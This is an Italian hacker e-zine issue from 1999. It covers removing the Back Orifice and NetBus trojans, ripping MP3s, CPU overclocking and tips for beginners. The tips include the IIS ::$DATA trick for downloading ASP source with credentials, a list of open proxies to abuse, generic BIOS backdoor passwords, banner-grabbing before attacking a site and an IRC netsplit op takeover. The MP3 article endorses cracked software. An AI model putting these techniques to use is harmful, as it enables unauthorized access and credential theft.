Pach_lib "lopks.spy" Cosi basta andare in Windows\System cercare il file lopks.spy , cliccare con il tasto destro sul file , selezionare Proprieta' . Se il suddetto file e' veramente il server del Back Orfice 1.20 avra': 122 KB di dimensione Versione file : 4.0.0.1 Copyright : Copyright ¸ 1998 Lingua : Inglese (Stati Uniti d'America) In caso contrario ritornate nel regedit.exe e provate un altro file. Quando lo avrete trovato bastera' eliminare questa riga da HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices riavviare il computer e cancellare il file (nell'esempio chiamato "lopks.spy") da c:\Windows\system. Se trovaste il server del Back Orfice sulla vostra macchina e volete sapere come e' stato configurato potrete sempre aprirlo con un editor di testi , andare nelle ultime righe del programma , dove troverete il ordine : 1)nome del file 2)descrizione del servizio 3)numero della porta usata 4)password 5)informazioni su eventuali plug-in NetBus v. 1.70 by Cf Il file che NetBus usa di default come server e' : patch.exe (462 o 483 KB) ma puo' essere rinominato e si installa nella cartella di Windows. Il file installato (e non) ha per icona una piccola antenna parabolica o una torcia con lo sfondo circolare blu. Se per esempio il file che vi hanno inviato si chiama pippo.exe ed e' il server del NetBus, nel Windows\regedit.exe la riga che lo fara' eseguire ad ogni avvio del computer sara': PIPPO "c:\windows\PIPPO.EXE /nomsg" nella cartella : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run percio' basta eliminare questa riga , riavviare il computer e cancellare il file pippo.exe da c:\Windows\. Il server del NetBus (configurato e non) si individua facilmente in quanto nella parte finale del valore ha sempre "/nomsg" Per evitare ci cancellare il file sbagliato e anche per vedere se avete il server del NetBus (non configurato) installato , vi consiglio di connettervi con il telnet alla porta 12345 e all'IP: 127.0.0.1 (o localhost) se vi apparira' la seguente riga : NetBus 1.70 x allora siete stati infettati . Se il server e' stato configurato (es. porta=12340 , password=lopks ecc..)in c:\windows\ ci sara' un file che avra' lo stesso nome del server (il nome lo avete trovato prima nella cartella del regedit.exe) , ma avra' l'estensione .INI nel nostro esempio percio' si chiamera' : pippo.ini Es. pippo.ini ............................................................................. [Settings] Port1=10000 ServerPwd=lopks LogTraffic=1 [email protected] [email protected] MailHost=server-SMTP (questa e' la porta) (questa e' la password) ............................................................................. a questo punto se siete paranoici e non siete ancora sicuri che quello sia il file di configurazione del server vi connettete con il telnet alla porta 10000 IP: 127.0.0.1 (o localhost); e se vi risponde con la riga NetBus 1.70 x allora siete stati infettati, percio' bastera' eliminare la riga nel regedit.exe: PIPPO "c:\windows\PIPPO.EXE /nomsg" riavviare il computer e cancellare il file pippo.exe e pippo.ini da c:\Windows\. TeLeCoMMaNDo v. 1.5.40 by NiGHT NaViGaToR Il file che TeLeCoMMaNDo usa come server a' : Odbc.exe (206 KB) nella cartella Windows\System In Windows\regedit.exe la riga che lo fa eseguire ad ogni avvio del computer e' : SystemApp "ODBC.EXE" nella cartella : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run percio' basta eliminare questa riga , riavviare il computer e cancellare il file odbc.exe da Windows\System +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +Copyright ¸ 1999 By LOPKS "Nemo me impune lacessit" http://come.to/lopks +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ L'MP3: QUESTO SCONOSCIUTO ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ L'mp3: questo sconosciuto Dal titolo sembrerebbe uno di quei documentari in stile PieroAngela ma non preoccupatevi, non ho mai visto Quark, ne' tantomeno ho un nome cosi' da pirla come quello che lo conduce. _____________________________________________________________________________ Il consumo per questo articolo e' ridotto a: 5 Marlboro Light direttamente dal mio contrabbandiere di fiducia che ruba onestamente allo Stato (ricordatevi che io abito comunque a Napoli eh,eh), 1/2 litro di CocaCola© e 2-3 bicchieri di sana e fresca acqua di rubinetto. _____________________________________________________________________________ Comunque tralasciando le frivolezze da comuni mortali bisogna per prima cosa precisare che tutta al parte tecnica riguardante campionamento, compressione e descrizione degli mp3 l'ho tratta da una delle riviste specializzate che ,non so come, ritrovo sul tavolo della mia scrivania pronte per essere sfogliate. Incominciamo. L'mp3 o mpeg-2 layer III e' lo standard di codifica dell'audio digitalizzato che ha ormai guadagnato uno spazio tutto suo nella grande rete per un motivo fondamentale: questo tipo di codifica permette di raggiungere un rapporto di compressione di 10:1 senza perdite nella qualita' del suono. Adesso vi starete chiedendo come sia possibile questo...Beh, nel comprimere il suono digitale l'encoder (cosi' come e' chiamato il programma che comprime un file audio trasformandolo in mp3) elimina tutte quelle frequenze superflue che non vengono percepite dall'orecchio umano risultando inutili, ma occupando comunque spazio. Ma veniamo alla parte piu' "cool dell'articolo", come crearsi da soli i propri mp3..... Estrazione audio Per prima cosa abbiamo bisogno di file .wav che in seguito saranno codificati e compressi in formato .mp3. Ci sono vari metodi per ottenere file wav contenenti canzoni. Un primo metodo sarebbe quello di farsi un proprio cavetto audio in modo tale da salvare su disco le proprie canzoni su musicassetta, vinile o cd passando dalla line in della scheda audio. Logicamente "grabbando" le canzoni da vinile o da nastro bisognerebbe prima un po' pulire i file wav ottenuti da tutti i fruscii causati dalle testine con un bel programma tipo Cooledit (non penserete mica di registrare con il registratore di suoni di Windozz??) Altro metodo, molto piu' funzionale e sopratutto quello che tuttora uso anchi'io,e' quello di usare appositi grabber per "rippare" le tracce audio dai cd e salvarle come wav. Purtroppo non tutti i lettori cd supportano l'estrazione audio digitale, ma credo si tratti di un problema ormai superato da mesi con l'avvento dei nuovi lettodi di piu' moderna generazione. Personalmente ho un Pioneer 32X che supporta il "ripping" ma ho anche avuto occasione di provare il mio programma su un Philips 32X, un Philips 40X, un AOpen 24X e un Waitec 32X Ultra SCSI: anche con loro il grabbing e' perfettamente riuscito. Se siete uno di quegli sfortunati possessori di lettori "maledetti" non avete altra scelta che usare molta pazienza e "giocherellare" con la vostra scheda audio.. Come programma per estrarre le tracce audio dai cd consiglio caldamente Windac (quello che uso io e' rigorosamente crackato, ma valide alernative sono anche l'Audio Grabber e il CDDA (questo non l'ho mai visto) Prima che vi cimentiate in azzardate manovre di estrazione audio in stile "catena di montaggio" devo avvertirvi che comunqque unsolo piccolo e misero minuti di registrazione in formato wav con una qualita' di 44Khz 16bit stereo occupa uno spazio su disco pari a 10 Mega!!!!!!!!!!! Quindi regolatevi voi prima di trovarvi riempito fino all'orlo e senza motivo l'hard disk :-) Encoding Ottenuti i vostri bravi wav non ci resta che comprimere il tutto in mp3. I motori di compressione sono in sintesi due: uno predilige la velocita' a scapito della qualita' e l'altro fa il contrario: impiega piu' tempo producendo mp3 di qualita' sensibilmente migliore (Inter.net non mi ricordo di che mese). Il primo e' stato elaborato dai laboratori Xing, quelli che hanno prodotto non a caso lo Xing Mpeg Encoder, l'encoder a mio giudizio pu' utilizzato dagli appassionati di mp3 e che tra l'altro uso anch'io. Il secondo fu elborato invece dal Fraunhofer-IIS che dovrebbe produrre file mp3 di migliore qualita' ma che reputo addirittura scadente se si considera che il tempo di compressione per un programma che utilizza questo motore sia astronomico e che d'altro canto non corrisponde una chissa' quale migliore qualita' del suono. I migliori encoder per mp3 reperibili sulla rete sono sostanzialmente 3 quelli legali piu' conosciuti (ma non bisonga dimenticare quelli illegali, si commetterebbe un grave errore) MpLifier, Xing MpegEncoder ecc... L'ultima chicca: decoding Uno dei lati piu' interessanti del mondo degli mp3, a mio giudizio, sta proprio nel poter di nuovo riavere il wav partendo dall'mp3 con il procedimento inverso. Pensateci bene: scaricare piccoli e teneri mp3 dalla madre Rete, farne dei wav e n seguito farsi la proprio compilation su cd da ascoltare senza regole sullo stereo di casa!!!! Che sballozzzz!!! "Beati quindi coloro che hanno un masterizzatore perche' loro sara' il regno della musica". Tutto questo e' reso ancora piu' semplice dal fatto che il WinAmp, il player per Winzozz piu' diffuso, ha gia' incorporato il suo decoder per la gioia di tutti i lamer. Vabbuo', anche per questa volta ho esaurito tutto il mio bagaglio culturale in materia con poche parole (e' una qualita' innata), ma non posso lasciarvi prima di avervi riferito la fonte del mio software per mp3 dove e' possibile recuperare tutti i programmi (anche qualcuno in piu') di cui ho parlato nel mio articolo. Mi raccomando scaricate e non lamerate eccessivamente. VaMp'S mP3 pAgE.....http://users.westnet.gr/~vamp71 See ya SCIAMAN ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ OVERCLOCK ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Come andare (un po') + veloci senza spendere una œ : l'Overclock 0:02 A.M. Le note del sax la padroneggiano nella buia stanza diffondendosi dolcemente nelle mie orecchie mentre una macchina con i suoi fari illumina la mia finestra ....porc' e' la finanza!!!!....Ah no....menomale era solo un timido avventore della strada...infime paure di ogni hacker.....Aaaaarrrrgggghhhh!!!! Ma il jazz riprende a compiere il suo effettotranquillizante e rilassante...reclino lo schienale..chiudo gli occhi e cerco di trovare l'ispirazione....riusciro' a fare un articolo decente una volta tanto ??? Penso al brutal phreakin' di domani notte con l'amicoPutty e rilasso le meningi....ok ci siamo...Overclock: alla lettera fuori-orologio...ke kaxxosignifica ??? Non so....ma lo posso immaginare......Kakkio secondo voi la velocita' del processoreo del settaggio della vostra scheda video come e' chiamata ??? Clock !! quindi... Overclock = fuori velocita'....fuori settaggio...Ora vi spieghero' in pratica che cappero vuol dire. Prendiamo come esempio la velocita' della vostra CPU. Diciamo che sia un processore con un clock a 166MHzla vostra CPU NON e' un processore a 166 MHZ!!!! Bensi' e' un processore OTTIMIZZATO per andare a quella velocita'.La sua velocita' non e' infatti racchiusa al suo interno e quindi riconosciuta dalla vostra scheda madre,al contrario e' la vostra scheda madre che setta la sua velocita'.Nel caso di una scheda video invece la sua velocita' e' settata da alcuni file di registro inseriti nelvostro computer. Ora vediamo in che modo la scheda mamma setta lavelocita' della CPU. -Occorrente: 1-manuale della vostra scheda mamma. 2-pazienza....ke palle !!! 3-volonta' di leggere il mio articolo fino alla fine. Se aprite il vostro mitico cassettone, alias case, potrete notare che accanto al piccolo cuoricino del vostro computer (CPU) ci sono dei jumper...cosa sono i jumper ???? Porc' la risposta e' semplice sono dei ponticelli. Questi ponticelli vi serviranno per non essere traghettati dal famoso quanto funesto Caronte Gatesa bordo del suo battello Winmerd su di un fiume di errori di sistema.......Eh no....purtroppo vi ho detto una bugia...questo e' impossibile.... vi e' solo una soluzione a questoproblema : Super-Linux....ma questo e' un altro discorso...Quei ponticelli servono "soltanto" ad aumentare o diminuire la velocita' della vostra CPU.Sfortunatamente il settaggio cambia per ogni scheda madre quindi non saro' in grado di esaminare il vostrocaso in particolare ma cerchero' di spiegarvi ilmetodo di funzionamento in modo facile in modo da rendervil'operazione di studio dell'overclock della vostra CPUil piu' semplice possibile.Incominciamo col dire che sulla vostra scheda madretroverete due tipi di jumper: 1-CPU external clock freqency ratio. 2-BUS frequency ratio. Questi tipi di jumper sono praticamente uguali potrete riconoscerli solo scartabellando attentamente ilvostro manuale di istruzioni della scheda mamma oppure in mancanza di quello osservando i numeri o le eventuali scritte poste vicino ai jumper.Veniamo alla funzione dei nostri ponticelluzzi: 1-I primi settano la velocita' di base che nel caso della mia scheda madre va' da un min di 50Mhz ad un max di 83Mhz. A seconda della posizione dei jumper cambiera' ovviamente la velocita' di base: Esempio visivo : 1 2 3 come potrete notare i jumper sono 3 e settati cosi' : + *-* 1° in posizione 2-3 *-* + 2° in posizione 1-2 *-* + 3° in posizione 1-2 I jumper collocati in questo modo sulla mia scheda madre indicano una external clock frequency ratio della CPU di 55Mhz.2-I secondi settano il fattore moltiplicativo anche chiamato BUS frequenty ratio.La velocita' di base infatti verra' poi moltiplicata per questo fattore. Es.1.5x o 2.0x ect.ect. 1 2 3 Fattore moltiplicatvo settato a 3.0x + + + (come potrete osservare il 1° jumper non c'e' !!) *-* + *-* + Facciamo un esempio: CPU a 166 Mhz, velocita' di base 55Mhz fattore moltiplicativo 3.0.Con un piccolo conticino da 2° elementare si ha 55 x 3.0 = 165 alias 166A questo punto potrete scegliere voi la velocita' del vostroprocessore che sara' variabile a seconda dalla vostra scheda mamma...ma ATTENZIONE !!! non esagerate o se proprio volete esagerare(ho visto un pentium 100Mhz volare a 200Mhz) prendete ledovute precauzioni : Pasta siliconica anti-frittura sul processore eventolina + grande possibile con velocita' variabile a seconda della temperatura....(quel mio amico del 100Mhz aveva montato una pala da elicottero sul processore)Io sinceramente vi consiglierei per essere sicuri di settareil processore ad una velocita' di 33Mhz superiore rispetto a quella ottimizzata, non di +.Per quanto riguarda l' overclock delle schede video e' tuttoun altro discorso, non si agisce sull'hardware ma sul software.Per prima cosa aprite Winmerd e trovate il file denominatoregedit.exe questo programmino vi permettera' di modificaretutti i file di registro del Winmerd compresi quelliin cui e' scritta il clock della vostra scheduccia. Ovviamente la directory cambiera' a seconda della scheda videoche avete ed a seconda della porta in cui e' installata.Beh l'articolo e' terminato :-) ....non mi restano che i saluti.Ringrazio per primo N0bodY88 che vorrei tanto vedere prima opoi...(**porc**) poi via discorrendo:La mia pulzelletta MsBliSs^ xche' mi sollazza,quelli del proxy che uso xche' mi coprono, tutti i lameroni del mondo...tra i quali ci sono anche io !!!,Ed infine tutta la Krew dei Newbie xche' siamo i + GRANDI !!!.Beh se vedemo gente.... n ///// H o o ) Ciao Zio Bill !!! nnHnn [ VVVVV ___/ By Dante Alighieri ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ PICCOLI TRUCCHI X NEWBIES ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ '-.'-.'-. '-. '-. '-. '-.'-.'-. '-. '-. '-. '-. '-.'-.'-. '-.'-.'-. '-. '-. '-. '-. '-. '-. .-''-..-''-. '-.'-..-''-. '-. '-. '-. '-. ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ ¡ Piccoli trucchi per newbies ¡ ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ Notiziole brevi dal mondo dell'hacking: 1. Volete scaricarvi un pagina .asp? Allora il motivo di cio' e' semplice! Molte volte nelle pagine asp, per esempio quelle degli siti XXX, fanno il confronto di login e password con quelle interne, e molte volte il login e password e' proprio nel file .asp! Come fare? Semplice! Agiiungete alla fine della pagina ::$DATA, in questo modo: http://www.sitoxxx.com/azz.asp diventera': http://www.sitoxxx.com/ass.asp::$DATA e avrete la paginozza sul vostro hard disk. Sta a voi decidere cosa fare :-P 2. Volete mandare messaggi ai telefonini via e-mail? Eheh, questa e' una delle ultime novita'! Allora come prima cosa dovrete scrivere una normale e-mail, nel corpo del messaggio andra' scritto cio' che vogliamo comunicare, facendo attenzione a superare i 140 caratteri. Il destinatario di questa e-mail sara': [email protected] Dove in numero_telefonino dovremo inserirci il numero del destinatario preceduto da +39 , se si trova in Italia. Esempio per il numero omnitel 0347999999: [email protected] Ed ecco che dopo un po' verra' ricevuta. :-) 3. Volete registrare il file winsck.ocx ? Insieme a questa rivista ci dovrebbe essere in allegato il file ocx.zip. Bene, questo file per chi non lo sapesse, dopo averlo scompattato, vi servira' per registrare il file ocx. Non vi spiego nulla percha' all'interno del file ZIP gia' vi ho messo la spiegazione. Miei cari newbiez! Ah, non dimenticatevi che Urkes e T0rment0 sono la stessa persona! 4. Come entrare nel sito del NORAD? Eheh vi piacerebbe che ve lo dicessi? In realta' non c'ho mai provato! Chissa' se dopo mi mettono in una stanza isolata o con qualche maniaco omicida! 5. Avete Linux e volete sapere come creare delle scorciatoie ai comandi? Allora tutto quello che dovete fare a' andare nel file /etc/profile ed aggiungere la voce alias. Se per esempio vorremo che quando facessimo dir uscisse una lista di file colorata e anche file nascosti dovremo usare: ALIAS dir=`ls -color -F -al` Questo e' solo un semplice esempio poi se volete fare cose piu' sofisticate sta solo alla vostra fantasia! 6. Come nascondere il mio ip in irc? Questa e' diventata una cosa abbastanza facile da fare ;-P Se lo volete fare da soli, scaricatevi un bel portscanner su internet, ce ne sono a milioni, e provate a fare una scansione su un dominio di classe c e cioe' prendete un sito, vi segnate il suo ip, se l'ip e' per esempio 194.196.123.1, voi non dovete fare altro che annullare la parte finale, in questo caso diventera' 194.196.123 e decidere quali porte bisogna scannare. La scansione andra' fatta sulla porta 1080 che corrisponde alla porta del firewall. Se ne trovate uno, ve lo segnate e lo andate a mettere come sock firewall nelle opzioni di mIrc. Se non ve ne tiene di far tutto cio', ecco una lista, non so quali funziano e quali no: 194.133.157.50 italiana 195.65.114.123 italiana 194.184.31.228 italiana veloce 194.184.106.202 (italiana) 194.119.249.7 intra.org pacman-cafe0.tri.forthnet.gr 209.122.45.1 americano gatekeeper.volvo.se 207.236.108.212 Americana www.ibw.ch 195.116.240.144 america bep.sut.ru 203.150.187.2 195.223.223.66 194.213.239.19 cz proxy.cyberg.it proxy1.firstenergy.com digitalsciences.wsii.com scott.gibbco.com 204.186.9.30 195.26.210.91 OK! gilmour.ne.mediaone.net 209.84.173.23 210.141.105.98 jappone 208.217.205.11 eternal.california.com simsdial.dowco.com grandwayne.fwi.com 195.103.64.226 italiana rub027.mi03.mi.interbusiness.it italia! whoweb.com 200.241.64.130 207.253.13.66 host.vittoria.it Questi non sono neanche la meta' di cio' che ho, ma non tutti funzionano, perche' quando si abusa di un firewall, finiscono per dargli un accesso ristretto. Cmq non approfittatene e mi raccomando usateli solo se col metodo del portscan non ne avete trovato nessuno. 7. Avete un amico il quale ha settato la password nel bios e ed ha il bios award? Non c'e' nessun problema! Infatti per il bios award esistono delle password generiche. Eccole qui: 589589 ALFAROMEO AWARD_SW Condo j332 lkwpeter Mi raccomando fate vedere chi siete! (ehm) 8. Prima di hackare Prima di hackare un sito, provate a connettervi col telnet alle porte del server in modo da scoprire, per esempio che sendmail usa oppure che server ftp usa, o se ha aperta la porta del finger. In certi casi questo e' molto utile perche' potreste evitarvi molta fatica di quanta ne dovreste fare 9. Conoscete uno che si chiama T0rment0 ed e' un ragazzo alla quale gli sono saltate le rotelle? In effetti le rotelle mi sono saltate da un bel po' e per ora son rimasto solo solo sulla mia carrozzina. Chissa' se un giorno verra' qualcuno per spingermi e farmi camminare...magari anche donna! Cmq vi volevo dire che questo piccolo articolo e' finito e che per qualsiasi cosa scrivetemi, la mia risposta non e' assicurata al 100% in quanto ho molto da fare (si, rispondere alle e-mail!) T0rment0 [email protected] http://come.to/hackernovello ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ COME DIVENTARE OP CON UAN BOTTA DI CULO ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ tIps & tRiKs Come posso diventare ChanOp su un canale irc? Be', l'operazione e' molto facile, basta però avere una buona dose di culo... Vi spiego: dovete trovare un server irc che e' splittato rispetto agli altri della stessa rete (es: ircnet). Be', se non sapete che vuol dire splittato... informatevi un po'! ;) Allora, una volta che siete sul server splittato, entrate nel canale dove volete prendere l'op, aspettate che il server si riconnetta con gli altri e avete fatto! Otterrai l'op insieme a quelli che gia' l'avevano... pensate un po' cosa potete fare con questo... have phun! _p0nic0_ [email protected] ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ SALUTI ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Ora che siamo arrivati alla fine di questa e-zine volevo solo salutare alcune persone: zerocool, AX1S, w00w00, ulntwh99, |lucio, kalidor, Dante Alighieri, Blum, |O2|, Biavo darkside, SpiritoZ, fusyllo, XsX, grays, Ap, Ja[3]cK, overmars, w0rf, cavallo, pigpen, Ron|n, tizio, /sPIRIT/, vecna, Dark Schnaider, linbus, vulcan, crusade3r, bricciolo, lord destruction, grays, spindoc , Ron|n, claytonu2, KaOsS, quilecool, icemaze, XsX, crazy crom, DrShade, Cyrus The Virus, ChEm-BoY, {D4m4g3~m4n}, lord shinva, lordjoker, _p0nic0_, ghimlet, pigreco, biavo, andrea, sentenza , ZioFill, Eva Kant, Aladar, Caratt, L0rd guF, Meew, RafCrash, Ramesse, Roboticx, SkHammer, SpYmAsTeR, Wurz, AcidRain, ]Games[, BlackJAM, Debian, Baudelaire, Black Baron, Darkman, drwxr-xr-, nietzsche, game, Z3r0, RedXIII, Squarty, Afree, Leomar, T0rment0, lopks, Soul Destroyer, Th4nk3R, cdp, CyberLele, Darius ^V^, Yago, Nemesis, Grays, quelli di BFI (grandi!), quelli di Spaghetti Phreaker (mitici!), quelli di tutte le e-zine italiane che esistono ma ma che io non conosco (gnurant..) il gruppo Spippolatori (SPP) con Master, RigoR MorteM, e gli altri del (non piu' esistente causa l'attacco in massa di noi newbies... senza pieta'...) ng ahccc Teresa Luan Canis, X-Hacker, Harlock, Misha, ChRoMe, ADaM, F14m3r, La Duchessa con l'Ermellino, Brigante, Fritz, The Duke, Buttha, neverin, Azathoth, Nebbia, Red Owl, 3eGIN^NeR, Alby, Yota, NighTiger, Black Baron, NO SPAM, Mr Good Trips, Macchia Nera, Kernel, Meimi, GekoVamp, Interbusiness, MasteR_OnE, Francesco Mapelli, AntoMar, erGoline, SirPsycoSexy, DR. SCHaFauSeN, Newbie 1.0, Cyberlele, tutti quelli del mitico it.comp.sicurezza tra cui Leonardo Serni, Kernel, Giglio, Marco d'Itri, Firebeam, Krmel, invy, Ataru Moroboshi, Marco d'Itri e gli altri di it.comp.sicurezza.virus, che purtroppo anche se scarico sempre riesco a leggere poche volte :(( Se vi ho dimenticato be....mi rifaro' la prox volta. ø|^__^|ø PS: un saluto speciale a Jam che se non scrive l'art. lo killano...hihihi Ps: dedico questa e-zine a K4m4l30nt3, colui con il quale ho iniziato quest'avventura e che ora non e' piu' tra noi.... dovunque tu sia questa e' per te fratello. _--={ ø(^__^)ø }=--_ Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me, ma non potete fermarci tutti... dopo tutto, siamo tutti curiosi uguali e con la stessa voglia di smanettare e di capire. +++Illo N0bodY88+++ January 16, 1999 Ok ora voglio fare anche io un mega salutone a Dark Schnaider [ complimenti x il sito ] , Biavo , w00w00 e tutti gli altri amici mirc che frequentemente vengono sul nostro beneamato canale #hackernow [ grazie di tutto cuore siete mitici ] . Ah mi dimenticavo una cosa .... Fanculo ai Lamer siete esseri immondi .... Come sono buono eh.. Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me, ma almeno aspettate che abbia fermato tutti i lamer di questo universo, dopo tutto non siamo tutti uguali ZeroCool _ _ ____ _ | \ | | _____ _| __ )(_) ___ ___ | \| |/ _ \ \ /\ / / _ \| |/ _ Y __| | |\ | __/\ V V /| |_) | | __|__ \ |_| \_|\___| \_/\_/ |____/|_|\___|___/ Webmaster by ---------> Redattore ------------> E-zine by ------------> Ascii by -------------> Loghi NewBies by -----> ZeroCool & Kalidor & Caratt N0bodY88 N0bodY88 & ZeroCool & NewBies Staff N0bodY88 RigoR MorteM Byez a tutti questo 2ø num della e-zine e' finito, speriamo che vi sia piaciuto e se avete qualke problema x cui non trovate documentazione, o qualke argomento che vi piacerebbe approfondire fatecelo sapere alla mail [email protected] che una volta visto di cosa si tratta, lo passero' al phreaker/hacker/newbies virus writer/cracker che sara' in grado di rispondervi :)